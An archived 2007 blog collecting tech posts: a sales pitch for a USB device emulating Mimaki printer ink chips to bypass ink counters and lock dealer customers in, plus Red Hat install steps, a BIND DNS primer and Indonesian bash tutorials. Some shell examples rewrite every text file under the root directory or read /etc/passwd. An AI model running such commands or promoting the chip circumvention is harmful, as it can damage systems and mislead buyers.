#Yogyakarta EFnet Learning Never End

The Usb emulator

2007-08-03T21:39:00.000+07:00

The Usb emulator is made by a powerful microprocessor that simulate the job of 8 Mimaki Original Id Chips!

It works like the Original Mimaki original chip! He accept Read command, Write commands and he have internal memory! The printer will never Know if he is using a original or a simulated chip! When one chip is empty, you just need to press a button and you will download a new one from our database! Automatically the printer counter will be at 9 and you will be able to print more 500ml of ink!

You can discard any chip at any time allowing you to keep the machine running for long jobs, without worries about chip end!

You can download 8 spare liters of ink and keep them as spares inside Emulator PCb to prevent problems in case of internet connection down!
his version is designed for Ink producers , ink distributors and machine dealers!

With it, the dealer can control all the printers they have installed on their customers.

The dealer will install a PCB on the customer machine and will install the Emulink Software on Rip computer!

EmuManager software will be installed on dealer office, and will be used as a management software for all printers installed in customers! With it the dealer can distribute the credits (liters of ink) to their customers! If a customer buy from it one litter of ink he will transfer for Customer account 1 credit (1 litter)! This credit can be given to customer free of charge, or can be sell.

This credit will automatically be posted on the customer's account and can be retrieved using the Emulink software previously installed by the Dealer on the customer's Rip computer!

Each PCB (installed on every machine used by the system) has a unique serial number ensuring a high level of security for the system!

The customer will never be able to buy extra credits from other dealers, other customers or from Chipemulator.com - the customer can only purchase credits from the original dealer. As a dealer, you can check on the existing number of credits for a particular customer at any time via the software.

A customer can have multiple machines installed. The system can manage the credits assigned to the various machines individually or as a group!

If the customer stops buying ink credits from you, the dealer, you can remotely disable their Emulator PCB.

If customer wants to start using ink from a competitor, the customer can only do so with your authorization otherwise the system will stop functioning when the credits run out.

How do I know if my PC has USB 2.0?

2007-08-03T21:36:00.000+07:00

You can identify whether your PC has Hi-Speed or not relatively easy. Open Device Manager and expand the Universal Serial Bus section. There should be an "Enhanced" USB host controller present.

Windows 98 systems may use a different name, because Hi-Speed USB drivers in these operating systems are not provided directly from Microsoft (Windows ME, 2000 and XP get their drivers through Windows Update).

These drivers are provided by the manufacturer, and may carry the maker?s name (i.e. ADS, Belkin, IOGear, Siig, etc.). There should also be two ?standard? version USB host controllers present as well. They are embedded in the USB chip

There are currently 6 manufacturers of the Hi-Speed USB host silicon themselves:
ALi (Acer Labs)

Intel

NEC

SiS

VIA

nVidia (shows as "Standard" controller

Any other brand name that appears in Device Manager would likely be an add-in Hi-Speed USB PCI card. The makers above do not make add-in cards, but they do make the chips that are used in them. which routes the differing USB speeds accordingly without user intervention.

Booting Linux Installation Program

2007-08-03T21:35:00.001+07:00

To begin setting up your new Red Hat system, either boot from the installation CD, or insert the installation diskette in the system's A: drive, and reboot or power-on the system. After a few moments, the Red Hat installation program screen should appear.

In most cases, you can just press to begin the installation process, but if you are a more experienced user who knows exactly how your hardware devices should be set up, you can enter ``expert'' for the additional information and prompts this feature provides. (If you do nothing, the default installation procedure will start in about 10 to 15 seconds after the installation screen first appears.)

You will then be asked to choose your language (usually "English") and your keyboard type (even in Canada I choose "US 101-key"), as well as where you are installing from (such as from your CD-ROM or over the network). Red Hat is very flexible in where it can be installed from.

Most likely you will choose ``Local CDROM'' to install from your Red Hat CD-ROM (which should be inserted into your CD-ROM device). However, if your system is not equipped with a CD-ROM device, there are a number of other installation methods you can choose.

If you have another Linux system (or any other operating system that supports NFS file mounting), you can use ``NFS'' to install from an NFS mount. To do this, you'll need to have your CD-ROM mounted in the other system (or otherwise have the Red Hat distribution tree somewhere on the other system -- it is possible to download everything via FTP and then install from your other system's hard drive), make sure you have an entry in your /etc/exports file allowing access by the new system to the appropriate directory (see Section 7.6 for details on how to set up and use NFS), and then enter the appropriate details. Here's an example walk-through:

*

Insert the Red Hat CD into the other system (eg. a system called ``spock'').
*

To mount the CD, type:

mount /dev/cdrom /mnt/cdrom -t iso9660

*

Edit, as the superuser, your ``/etc/exports'' file and put an entry like:

/mnt/cdrom newsys.mydomain.name(ro)

(This says that the new system at newsys.mydomain.name is allowed read-only access to the directory ``/mnt/cdrom/'' and any subdirectories under it).

If your new system does not yet have a domain name assigned to it, you can instead use its IP address:

/mnt/cdrom 10.23.14.8(ro)

(Assuming your new system has 10.23.14.8 as its IP address).
*

Again, as superuser, type:

killall -HUP rpc.nfsd ; killall -HUP rpc.mountd

This will restart your NFS and mountd daemons, which is necessary before your new NFS export will work.
*

Now, from your new system, you can choose ``NFS'' as your installation source. You'll be asked to provide information on your network card, as well as your IP settings. You'll likely use static IP settings if your system is sitting on a local LAN, or DHCP settings if, for example, your system is connected to a cable modem. Enter the settings as appropriate for your new system.
*

You'll then be asked to enter the NFS server name and Red Hat directory. For our example system, we would type in ``spock'' as the NFS server name, and ``/mnt/cdrom/'' as the Red Hat directory.

There are other ways of installing Red Hat, such as using a Samba (Windows-style networking) connection, from an existing partition (such as your DOS or Windows 95 partition) on your hard drive, or via FTP. Check the Red Hat users guide for more details on installing using these methods, or just try to struggle through them (the procedures are really not very difficult!)

Once you have chosen your installation source, Red Hat will ask you if you wish to "Install" or "Upgrade" your system. As you are installing a new system, you should choose "Install". (As an aside, I'm a fairly anal person who never upgrades new distribution releases over existing systems -- I guess having suffered through so many problems with Microsoft products I have developed a significant mistrust for upgrading systems as a whole. I prefer to install from scratch, and simply restore from backup my personal/user and local site files.)

The installation program will then ask you if you have a SCSI adapter. If you answer yes, you'll be asked to choose the appropriate driver. In some circumstances, Red Hat will be able to detect your adapter automatically.

Next, you'll be asked to set up your file systems (ie. partition one or more drives for Linux). There are two tools available for setting up these partitions, including the Red Hat-supplied "Disk Druid", and the standard Linux "/fdisk" utility.

Both tools are similar in function, allowing you to specify the partition types and sizes. However, Disk Druid seems to be a bit more "user friendly", and a bit more complete than fdisk. In fact, if you use fdisk to partition your drives, you'll then be presented with the Disk Druid screen for specifying your mount points anyway. That being said, as an ex-Slackware user, I personally always use fdisk -- force of habit, I guess! :-)

BIND DNS server

2007-07-28T13:52:00.000+07:00

Bind atau named adalah sebuah aplikasi dari DNS (Domain Name Server) yang dibuat oleh Paul Vixie. Named bekerja secara background mendengarkan permintaan client pada port 53.
Untuk merequest sebuah domain di Indonesia dapat memohon kepada http://www.idnic.net.id. Idnic melayani permohonan domain dengan akhiran co.id, ac.id, dan go.id.
Yang menyediakan domain-domain tertentu dengan gratis untuk belajar named dan mencoba, misalnya : http://www.za.net dan http://www.ml.org. Syaratnya cuma satu yaitu mempunyai beberapa alamat IP, 2 atau 3 sudah cukup.
Konsep DNS
Dalam berkomunikasi, antar komputer sudah cukup dengan menggunakan alamat IP. Namun untuk manusia diperlukan sebuah nama untuk saling kenal dan oleh karena itu DNS ada. Manusia tidak mudah mengingat alamat IP yang terdiri dari angka dibandingkan sebuah nama.
DNS adalah sebuah aplikasi untuk menukarkan nama komputer ke alamat IP dan sebaliknya. Contoh software untuk DNS adalah BIND (Berkeley Internet Name Domain) untuk UNIX atau sering disebut named. Cara kerja DNS adalah sbb :
Misalkan ada client yang menanyakan "berapa alamat IP dari www.ilmu.net ?". Pertanyaan ini dilemparkan ke DNS Lokal. Dengan segera DNS Lokal memeriksa databasenya. Kemudian ternyata www.ilmu.net tidak terdapat di dalam databasenya. Lalu ia memeriksa cache. Bila ada, jawaban langsung dikirim ke client. Tapi bila tidak ada, maka ia akan mencari jawabannya ke Root DNS. Root DNS pasti mempunyai database yang dimaksud dan memberikannya ke DNS Lokal dan pada akhirnya diberikan ke client tadi.
Root DNS ini memuat seluruh daftar nama yang ada di dunia, dan Root DNS ini tidak hanya terdiri dari satu server melainkan sekitar 13 server yang diletakkan di seluruh dunia.
Nama domain di dunia dipecah menjadi :
.com (komersial)
.org (organisasi)
.edu (education/pendidikan)
.gov (government/pemerintahan)
.mil (military/militer)
.net (network)
dan di Indonesia diubah sedikit menjadi :
.co.id (komersial)
.or.id (organisasi)
.ac.id (academic)
.go.id (government)
.mil.id (militer)
.net.id (layanan jaringan)
Pembagian ini berdasarkan kepada jenis institusi yang meminta nama domain.
Selain itu, penyusunan domain dibuat bertingkat dan mempunyai hirarki tertentu. Domain-domain di seluruh dunia sangat banyak dan tidak mungkin semuanya ditampung oleh Root DNS. Root DNS hanya memegang 'kepala' dari domain tertentu.

Otomatisasi dengan skrip shell (bagian 2)

2007-07-28T13:51:00.000+07:00

Priyadi Iman Nurcahyo
Majalah InfoKomputer
Juli 2000

Dalam edisi yang lalu, kita telah membahas beberapa konstruksi dari Bourne Again Shell. Kini kita akan membahas beberapa konstruksi lainnya, serta bagaimana mengotomatisasi eksekusi skrip shell melalui cron dan at.
Konstruksi untuk Looping
Bash memiliki dua buah konstruksi untuk melakukan iterasi, yaitu while dan until. Keduanya memiliki sintaks seperti di bawah ini:
while kondisi ; do perintah ; done
until kondisi ; do perintah ; done
Pada konstruksi while, bash akan mengeksekusi perintah berulang-ulang jika kondisi bernilai benar. Sedangkan pada konstruksi until, bash akan mengeksekusi perintah berulang-ulang jika kondisi bernilai salah.
Sebagaimana konstruksi lainnya, anda dapat menggabungkan beberapa perintah dalam satu baris dengan menggunakan titik koma (;). Anda juga dapat mengeksekusi perintah di dalam sub-shell dengan menuliskannya di dalam tanda kurung. Kondisi dapat berupa perintah shell biasa ataupun test kondisi (lihat di bawah). Anda juga dapat menempatkan beberapa perintah di dalam kondisi, namun anda harus memasukkannya di dalam tanda kurung (dieksekusi di dalam sub shell), perintah yang akan dicek kebenarannya adalah perintah yang terakhir.
Contoh:
• (while true ; do (clear ; who ; sleep 5) ; done), memonitor user yang sedang online, perintah tersebut akan menghapus layar, kemudian menampilkan output perintah who berulang-ulang setiap lima detik. Perintah true akan selalu bernilai benar. Seluruh konstruksi while dijalankan di dalam sub-shell supaya dapat di-break dengan menggunakan Ctrl-C, jika tidak, Ctrl-C hanya akan berpengaruh pada perintah (clear ; who ; sleep 5).
Konstruksi untuk Kondisi
Kondisi adalah konstruksi yang wajib dimiliki oleh bahasa pemrograman dan skrip apapun. Bash memiliki konstruksi seperti dalam bentuk if ... then ... else ... fi. Konstruksi tersebut memiliki sintaks seperti ini:
if kondisi
then
perintah1
else
perintah2
fi
Bash akan mengeksekusi perintah1 jika kondisi terpenuhi, atau bash akan mengeksekusi perintah2 jika kondisi tidak terpenuhi. Seperti biasa, kondisi dapat terdiri dari beberapa perintah shell jika dilingkungi oleh tanda kurung. Perintah1 dan perintah2 dapat juga terdiri dari beberapa baris perintah.
Beberapa buah contoh:
• if ping -c1 sinta ; then logger "sinta hidup" ; else logger "sinta meninggal" ; fi, ping -c1 delta akan mencek apakah komputer bernama sinta sedang aktif. Jika sedang aktif, pesan "sinta hidup" akan dikirim ke syslog, dan jika sedang mati, pesan "sinta meninggal" akan dikirim ke syslog. Di kebanyakan distribusi Linux, biasanya pesan tersebut akan ditemukan di file /var/log/messages atau /var/adm/messages
• for A in `find / -type f`
• do
• if (file $A | grep text > /dev/null)
• then
• sed s/10\.0\.0\.1/192.168.0.1/g < $A > $A._tmp
• mv -f $A._tmp $A
• fi
• done
• Perintah ini akan mengganti seluruh string 10.0.0.1 menjadi 192.168.0.1 pada setiap file teks yang ada di dalam filesystem. Perintah file $A | grep text akan bernilai benar jika file pada variabel $A adalah file teks.
• while true
• do
• sleep 5
• if (ifconfig | grep ppp0 > /dev/null)
• then
• if ( ! ps -x | grep -v grep | grep gnomeicu > /dev/null)
• then
• gnomeicu -a &
• fi
• if ( ! ps -x | grep -v grep | grep gaim > /dev/null)
• then
• gaim &
• fi
• else
• killall gnomeicu 2> /dev/null
• killall gaim 2> /dev/null
• fi
• done
• Perintah di atas akan mencek kondisi link internet dial-up setiap 5 detik. Perintah ifconfig | grep ppp0 mencek apakah string ppp0 ada pada output dari ifconfig, dengan kata lain mencek apakah link internet dial-up sedang aktif. Jika sedang aktif maka bash akan menjalankan gnomeicu dan gaim di background (dengan menggunakan tanda &), dan jika sedang tidak aktif, bash akan mematikan kedua proses tersebut. Tanda \ pada skrip di atas berguna untuk memisahkan baris yang terlalu panjang ke baris lainnya, namun tetap dianggap sebagai satu baris perintah oleh bash. Perintah ps -x | grep -v grep | grep gnomeicu akan memberikan nilai benar jika ditemukan proses gnomeicu yang sedang aktif, grep -v grep dalam hal ini diperlukan untuk memfilter string grep, karena string grep gnomeicu akan muncul pada tabel proses. Tanda 2> /dev/null akan mengakibatkan pesan error tidak ditampilkan (killall akan menampilkan pesan error jika proses yang akan dimatikan ternyata tidak aktif. Namun skrip shell tersebut akan lebih efisien jika dilakukan dari dalam cron (lihat di bawah).
Menjalankan Perintah Secara Berkala dengan Cron
Cron berguna untuk menjalankan perintah-perintah setiap waktu tertentu. Sebelum menggunakan cron, pastikanlah daemon crond sedang berjalan dengan menggunakan ps auwx | grep crond. Jika belum aktif, aktifkanlah dengan menggunakan skrip inisialisasi crond, biasanya ditemukan di /etc/rc.d/init.d pada distribusi RedHat atau kompatibel, atau /etc/init.d pada distribusi Debian. Untuk mengaktifkannya pada setiap booting gunakan ntsysv jika anda menggunakan RedHat atau kompatibel.
Konfigurasi cron dilakukan dengan menggunakan perintah crontab -e. Sebelum menjalankan crontab, ada baiknya anda menset variabel EDITOR berisi editor teks favorit anda, misalnya: export EDITOR=pico, jika anda menggunakan pico.
Format crontab terdiri dari beberapa baris, dengan satu baris berisi satu perintah berkala. Setiap baris terdiri dari lima buah field pertama yang berisi informasi kapan perintah tersebut akan dijalankan. Field-field tersebut adalah:
• menit, bernilai 0-59
• jam, bernilai 0-23
• tanggal, bernilai 0-31
• bulan, bernilai 0-12
• hari, bernilai 0-7 (0 atau 7 adalah hari Minggu)
Selain dari field-field tersebut, adalah perintah yang akan dieksekusi oleh cron. Nilai dapet berupa range (dipisahkan oleh -) atau beberapa nilai (dipisahkan oleh koma (,)). Anda dapat juga menggunakan asterisk untuk mencantumkan semua nilai yang mungkin untuk field tersebut.
Contoh:
• 5 0 * * * cat /dev/null > /var/log/pacct
mengosongkan file /var/log/pacct (untuk keperluan process accounting) setiap jam 12 malam lewat 5 menit
• 5 3 1,15 * * df | mail admin
melaporkan keadaan ruang harddisk kepada admin melalui email setiap tanggal 1 dan 15 setiap bulannya, pada pukul 3.15 pagi
• * * * * * (if (ifconfig | grep ppp0) ; then /usr/local/bin/ppp-nyala ; else /usr/local/bin/ppp-mati ; fi ) > /dev/null 2>&1
(semua dalam satu baris)
akan menjalankan skrip /usr/local/bin/ppp-mati jika koneksi internet dalam keadaan hidup, dan menjalankan /usr/local/bin/ppp-mati jika koneksi dial-up internet dalam keadaan mati, pengecekan dilakukan setiap menit.
• 0 0-23/2 * * 1-5 (if ping -c1 donna ; then logger "donna sehat wal afiat" ; else logger "donna meninggal" ; fi)
(semua dalam satu baris)
mencek keadaan donna (komputer bernama donna) apakah hidup atau mati (dengan cara ping), pengecekan dilakukan setiap dua jam pada hari kerja (Senin-Jumat), pesan akan disampaikan melalui syslog.
• 0 3 * * * (cd /home/priyadi/htdocs/lt ; wget http://www.linuxtoday.com)
(semua dalam satu baris)
mendownload halaman muka dari LinuxToday ke dalam direktori /home/priyadi/htdocs/lt setiap jam 3 pagi.
Menjalankan Perintah di Masa Yang Akan Datang
Jika cron menjalankan sebuah perintah secara rutin, maka at menjalankan perintah hanya satu kali. Perintah yang sering digunakan untuk menjalankan at adalah sebagai berikut:
echo "perintah" | at waktu
at akan membaca perintah dari standard input, dan menjalankannya pada waktu yang telah ditentukan. Seperti halnya crond, untuk menjalankan at, anda harus mengaktifkan daemon atd. Cara pengaktifannya mirip dengan cara mengaktifkan crond di atas. Perintah yang dijalankan melalui at akan memiliki lingkungan yang serupa dengan lingkungan pada saat anda menjalankan at.
at juga memiliki beberapa program pembantu:
• atq, untuk melihat perintah-perintah yang akan dikerjakan oleh at
• atrm, untuk menghapus perintah-perintah tersebut, gunakan nomor perintah seperti yang tercantum di perintah atq
Beberapa contoh penggunaan at:
• echo "wget -t0 -c ftp://updates.redhat.com/6.0/i386/*" | at 0200
mendownload update dari RedHat Linux 6.0 pada jam 2 malam
• echo "cat /boot/vmlinuz > /dev/dsp" | at 0500
membangunkan anda pada jam 5 pagi. cat /boot/vmlinuz > /dev/dsp akan mengirimkan kernel Linux langsung ke kartu suara anda, tentunya anda juga dapat menggantikan kernel Linux dengan file suara yang lebih enak didengar :-)
• echo "killall pppd" | at now+15minutes
akan memutuskan hubungan Internet anda 15 menit kemudian.
• echo "halt" | at now+2hours
akan mematikan komputer anda dua jam kemudian (tentunya jika komputer anda memiliki fasilitas ATX)
Memilih Jalan untuk Menyelesaikan Pekerjaan Anda
Walaupun Linux memiliki antarmuka grafis yang menarik, namun belum tentu antarmuka grafis akan menyelesaikan pekerjaan lebih cepat dan efisien dibandingkan antarmuka teks. Dengan antarmuka grafis, sebuah pekerjaan akan lebih mudah dipelajari, dan akan lebih mudah dikerjakan, jika fasilitas untuk menyelesaikan pekerjaan anda tersedia. Namun jika tidak tersedia, anda tidak memiliki pilihan apa-apa. Antarmuka teks lebih sulit dipelajari dibandingkan dengan antarmuka grafis, namun memiliki kelebihan dalam hal otomatisasi, anda dapat menyingkat pekerjaan-pekerjaan yang berulang-ulang, dan menginstruksikan komputer untuk mengerjakan pekerjaan-pekerjaan tersebut. Hal ini tentunya akan menghemat sumber daya, dan memaksimalkan pekerjaan komputer, sehingga dapat menekan biaya operasional. Sebuah server bahkan hampir tidak perlu mendapat perhatian manusia jika segalanya telah diotomatisasi.
Linux mendukung kedua antarmuka tersebut, grafis dan teks, sehingga anda dapat memanfaatkan antarmuka yang lebih menguntungkan untuk menyelesaikan pekerjaan-pekerjaan anda. Anda dapat menggunakan komputer dengan salah satu dari antarmuka tersebut, namun anda dapat menggunakan komputer dengan lebih efisien dan efektif jika anda menggunakan keduanya.
Mungkin hal yang lebih sulit adalah mengidentifikasi pekerjaan-pekerjaan yang dapat diotomatisasi dalam antarmuka teks karena hampir semua dari kita telah terbiasa oleh antarmuka grafis. Mengotomatisasi pekerjaan adalah hal membutuhkan sumber daya (waktu) yang tidak sedikit, namun otomatisasi akan menghemat waktu anda dalam jangka panjang. Hal yang harus anda lakukan adalah mencari pekerjaan-pekerjaan yang dilakukan secara berulang kali, serta tidak membutuhkan pemikiran manusia. Pekerjaan-pekerjaan seperti membackup file, mendownload email, serta menghapus file log adalah kandidat kuat untuk diotomatisasi karena tidak membutuhkan pemikiran manusia. Sedangkan pekerjaan-pekerjaan seperti membuat surat atau laporan serta membuat program adalah hal-hal yang membutuhkan pemikiran serta perasaan manusia, dan tidak dapat dilakukan sepenuhnya oleh komputer.
Yang diperlukan untuk melakukan otomatisasi hanyalah kreativitas, karena di dalam kebanyakan distribusi Linux, semua program untuk keperluan tersebut telah disediakan.

Otomatisasi dengan skrip shell (bagian 1)

2007-07-28T13:48:00.000+07:00

Priyadi Iman Nurcahyo
Majalah InfoKomputer
Juli 2000

Anda dapat menggunakan Linux tanpa menyentuh antarmuka command line, namun dengan command line anda dapat melakukan banyak hal yang tidak mungkin dilakukan di antarmuka grafis (GUI). Anda pun dapat mengotomatisasi pekerjaan-pekerjaan yang pada kondisi biasa memerlukan anda untuk berhadapan langsung di depan komputer.
Di saat Linux mendapatkan tampilan yang menarik dan semakin mudah untuk digunakan, namun perintah-perintah command line tetap digemari oleh penggunanya karena banyak sekali pekerjaan yang akan jauh lebih efisien dan efektif jika dikerjakan dengan command line.
Kelebihan lainnya dari perintah command line adalah mudah untuk diotomatisasi, misalnya anda dapat menjalankannya pada saat komputer anda booting, pada saat login, atau pada waktu tertentu. Selain itu perintah command line akan lebih berguna jika anda perlu untuk mengakses komputer lain yang jaraknya jauh, anda tidak akan menggunakan tampilan grafis untuk mengakses server anda yang berada di Amerika, misalnya.
Vendor sistem operasi lain sering menyebarkan isu bahwa command line adalah salah satu kelemahan Linux (dan sistem operasi UNIX lain pada umumnya) karena sulit untuk digunakan dan tidak user friendly. Namun jika anda telah menguasai command line di Linux, anda akan mendapatkan bahwa command line bukanlah kelemahan, melainkan kelebihan dari Linux. Isu tersebut hanyalah trik-trik marketing dari pihak-pihak yang tidak menginginkan kesuksesan Linux (dan UNIX lainnya).
Bagi anda yang telah berpengalaman pada command line pada sistem operasi DOS atau Windows (command.com pada DOS dan Windows95/98 atau cmd.exe pada Windows NT), anda tentunya sering menemui kebuntuan dalam memecahkan masalah. Anda akan menemui bahwa command line pada Linux lebih fleksibel dan mudah untuk digunakan.
Bash, shell standard pada Linux
Lingkungan command line yang paling umum ditemukan di sistem Linux adalah Bourne Again Shell (bash). Bash dibuat oleh Brian Fox dari Free Software Foundation. Bash merupakan pengembangan dari Bourne Shell (sh) dan Korn Shell (ksh) dari sistem UNIX, sehingga bash cukup kompatibel dengan skrip-skrip yang ditemukan di sistem UNIX lainnya. Selain bash, Linux juga memiliki beberapa shell lainnya seperti tcsh, ash dan zsh. Artikel ini hanya akan membahas shell yang paling umum digunakan, yaitu bash.
Shell adalah software yang memberikan interaksi pada pengguna komputer, anda menggunakan shell jika anda melakukan login pada console Linux, atau membuka xterm pada X Window System.
Membuat skrip shell
Skrip shell adalah kumpulan perintah-perintah yang akan dieksekusi. Skrip shell mirip dengan batch file pada sistem DOS dan Windows. Selain itu skrip shell juga memiliki konstruksi seperti halnya bahasa pemrograman pada umumnya, misalnya: while, for, switch, if, fungsi dan lain-lain.
Anda membuat skrip shell dengan menggunakan editor teks seperti halnya vi, pico, gedit, joe atau emacs. Pilihlah teks editor yang paling anda sukai. Misalnya anda menggunakan pico, gunakan perintah seperti ini untuk membuat skrip shell yang bernama hello:
$ pico hello
Setelah itu anda buatlah isi dari file hello tersebut, misalnya:
echo hello world
Kemudian simpanlah file tersebut dan keluar dari editor teks yang anda gunakan. Untuk membuat skrip shell hello tersebut dapat dijalankan, gunakan perintah:
$ chmod +x hello
Perintah tersebut akan membuat file hello menjadi dapat dieksekusi. Anda dapat menjalankannya dengan perintah seperti:
$ ./hello
Jika berhasil, anda akan mendapatkan output:
hello world
Pipe dan Redireksi
Banyak perintah di Linux yang sangat sederhana, biasanya mendapatkan inputnya dari standard input atau parameter dan mengeluarkan outputnya ke standard output. Perintah-perintah ini tidak berguna jika digunakan sendirian. Namun beberapa dari perintah-perintah tersebut dapat dirangkaikan untuk mengerjakan tugas yang spesifik.
Beberapa contoh perintah-perintah tersebut adalah:
• cat: membaca isi parameter-parameternya, kemudian mengeluarkannya ke standard output. Contoh: cat /etc/passwd akan menampilkan isi dari file /etc/passwd
• wc: membaca standard input kemudian memberikan output jumlah karakter, kata dan baris pada standard output.
• find: mencari file yang sesuai kriteria pada parameternya, kemudian memberikan outputnya ke standard output. Contoh: find -type d akan menampilkan daftar direktori di bawah direktori kerja.
• sed: membaca standard input, mengeditnya sesuai dengan perintah pada parameternya, kemudian memberikan outputnya ke standard output. Contoh: sed -e s/lama/baru/g akan mengganti semua kata lama pada standard input menjadi baru
• grep: membaca standard input, kemudian menampilkan baris yang berisi string pada parameter grep. Contoh: grep root akan menampilkan baris pada standard input yang berisi kata root.
Perintah-perintah tersebut dapat kita rangkaikan untuk memproses data, sebagai contoh:
• cat /etc/passwd | grep rina, akan menampilkan baris-baris yang berisi string 'rina' dari file /etc/passwd
• find | grep -i mp3, akan menampilkan seluruh file MP3 pada direktori kerja dan direktori di bawahnya
• find /usr/src/linux/ | grep "\.[chS]$" | wc, menampilkan jumlah file yang berakhiran c, h dan S pada kode source Linux.
• find /usr/src/linux/ | grep "\.[chS]$" | xargs cat | wc, menampilkan jumlah karakter, kata dan baris pada seluruh file yang herakhiran c, h dan S pada kode source Linux.
Perintah-perintah di atas akan menampilkan outputnya pada terminal, anda pun dapat menampilkan output pada sebuah file, sebagai contoh:
• find /var/mp3/ | grep -i mp3 > semua.m3u, akan membuat file playlist MP3 semua.m3u yang berisi seluruh file MP3 di direktori /var/mp3/
• cat source.c | sed s/execv/execvp/g > source_baru.c, mengganti seluruh string execv menjadi execvp pada file source.c, kemudian mengoutputkannya ke file source_baru.c
Anda pun dapat mendapatkan input dari file, jadi beberapa perintah di atas dapat kita sederhanakan menjadi:
• grep rina < /etc/passwd, hasilnya sama dengan cat /etc/passwd | grep rina
• sed s/execv/execvp/g < source.c > source_baru.c, hasilnya sama dengan cat source.c | sed s/execv/execvp/g > source_baru.c
Dapat kita lihat, dari perintah-perintah yang kelihatannya tidak berguna itu, dapat dirangkai menjadi banyak sekali kombinasi untuk mengerjakan tugas-tugas yang beraneka ragam. Dokumentasi lengkap dari masing-masing program tersebut tersedia pada halaman man atau info program yang bersangkutan. Pipe dan redireksi akan sangat berguna jika kita akan membuat skrip shell yang akan mengotomatisasi pekerjaan kita sehari-hari.
Substitusi Perintah
Anda dapat melakukan substitusi suatu perintah dengan outputnya pada bash. Perintah yang berada di antara tanda kutip terbalik (`) akan digantikan dengan output dari perintah tersebut.
Sebagai contoh:
• cat `find -type f | grep "\.h$"` | wc, pada perintah ini, bagian find -type f | grep "\.h$" akan digantikan dengan output dari perintah tersebut, yaitu daftar file yang berakhiran h pada direktori kerja dan direktori di bawahnya. Jadi misalnya perintah tersebut menemukan file-file stdio.h, unistd.h dan stdlib.h, maka perintah tersebut akan menjadi cat stdio.h unistd.h stdlib.h | wc, yang akan menampilkan jumlah karakter, kata dan baris pada ketiga file header tersebut.
• cp `find -type f | grep -i mp3` /var/mp3, perintah find -type f | grep -i mp3 disini akan mencari file MP3 pada direktori kerja dan direktori di bawahnya, sehingga perintah tersebut akan men-copy seluruh file MP3 pada direktori kerja dan direktori di bawahnya ke direktori /var/mp3.
Namun anda harus hati-hati, pada kedua perintah di atas jika output dari perintah yang akan disubstitusi tersebut terlalu banyak, maka kemungkinan akan terjadi pesan kesalahan. Sebabnya adalah ada jumlah parameter maksimum yang dapat diberikan pada satu program (dalam hal ini adalah cat dan cp). Untuk mengatasi hal tersebut anda dapat menggunakan xargs atau konstruksi for di bawah.
Dengan xargs, perintah pertama di atas dapat diganti menjadi:
• find -type f | grep "\.h$" | xargs cat | wc, pada perintah ini xargs akan menjalankan perintah cat untuk masing-masing file pada standard input-nya.
Perintah kedua hanya dapat dilakukan dengan konstruksi for.
Konstruksi 'for'
Bash memiliki konstruksi for, dengan sintaks seperti:
for A in linus richard eric
do
echo $A
done
Perintah di atas akan memberikan output seperti ini:
linus
richard
eric
Secara umum konstruksi for akan mengeksekusi barisan perintah di antara do dan done secara berulang-ulang untuk setiap parameter (dalam hal ini adalah linus, richard dan eric), pada perintah di atas, parameter akan disimpan di variabel $A.
Jadi konstruksi di atas akan mengeksekusi perintah-perintah seperti ini:
echo linus
echo richard
echo eric
Beberapa perintah di bash dapat disatukan dalam satu baris perintah dengan menggunakan titik koma (;), jadi perintah di atas dapat disatukan dalam satu baris menjadi: for A in linus richard eric ; do echo $A ; done
Beberapa contoh konstruksi for:
• for A in `find -type f | grep -i mp3` ; do cp $A /var/mp3 ; done, perintah ini memiliki efek yang sama seperti contoh kedua pada substitusi perintah di atas, namun tidak ada batasan pada jumlah file yang ditemukan.
• for A in `cat semua.m3u` ; do mpg123 $A ; done, perintah ini akan memainkan file MP3 yang terdapat di dalam playlist semua.m3u dengan menggunakan player mpg123.
• for A in `find /etc/ -type f` ; do sed -e "s/10\.0\.0\.1/192.168.0.1/g" < $A > /tmp/file.tmp ; cp -f /tmp/file.tmp $A ; done, perintah ini akan mengganti string "10.0.0.1" ke "192.168.0.1" pada seluruh file di dalam direktori /etc/.
• cd /home/ ; for A in * ; do (cd /var/backup ; tar cfzp $A.tar.gz /home/$A; chown $A $A.tar.gz) ; done, perintah ini akan membuat file backup dari setiap home directory pada /home, dan mengganti kepemilikan file backup tersebut menjadi milik user yang bersangkutan. Perintah pada dalam kurung di atas akan dieksekusi di dalam sub shell, gunanya supaya environment (direktori kerja, variabel environment dan sebagainya) tetap sama untuk setiap perintah yang dieksekusi oleh for.

Pedoman memilih Hardware dengan Linux

2007-07-28T13:46:00.000+07:00

Priyadi Iman Nurcahyo
Majalah InfoKomputer
Mei 2000

Sebagai pemakai komputer, anda tentunya menginginkan hardware yang didukung oleh sistem operasi yang anda gunakan. Karena tanpa dukungan software yang memadai, investasi hardware anda akan menjadi tidak berguna. Artikel ini akan membahas mengenai hardware-hardware yang didukung oleh sistem operasi Linux dengan menitikberatkan pembahasan pada platform PC berprosesor Intel dan kompatibel.
Pada dasarnya ada beberapa pedoman dasar untuk memilih hardware untuk digunakan pada platform Linux:
• Pilihlah hardware yang spesifikasi teknisnya diketahui. Driver akan lebih mudah dibuat jika spesifikasi teknisnya diketahui. Walaupun demikian, cukup banyak hardware yang drivernya dibuat dengan metoda reverse engineering karena pembuat hardware tidak mau memberikan spesifikasi teknisnya.
• Driver yang Opensource berkualitas lebih baik daripada yang closed source. Terkadang, pembuat hardware memberikan driver closed source untuk hardware yang bersangkutan. Driver closed source terkadang hanya berlaku untuk kernel versi tertentu, hal tersebut dapat memaksa anda untuk menggunakan kernel Linux versi tertentu saja. Masalahnya akan bertambah rumit jika anda menggunakan dua atau lebih driver closed source.
• Gunakan hardware yang drivernya ada pada source kernel Linux. Jika sebuah driver sudah terdapat di dalam source kernel Linux, artinya Linus Torvalds dan pemrogram kernel Linux lainnya sudah mempercayai kehandalan driver tersebut. Driver yang terdapat pada source kernel Linux sudah pasti adalah Opensource.
Berikut ini adalah pedoman singkat untuk memilih jenis hardware tertentu yang didukung Linux dengan baik. Linux berkembang dalam kecepatan yang tinggi, jadi ada kemungkinan tulisan di artikel ini sudah tidak berlaku dalam beberapa bulan ke depan, untuk itu penulis juga akan memberikan URL-URL untuk mendapatkan informasi terbaru.
Kartu grafis
Hampir semua kartu video yang populer di pasaran didukung oleh XFree86 (http://www.xfree86.org), di antaranya adalah:
• Seluruh kartu grafis 3DFX seperti Voodoo Banshee, Voodoo 1, 2 dan 3 didukung penuh oleh Linux. 3DFX adalah salah satu pembuat hardware yang menyatakan dukungannya untuk Linux.
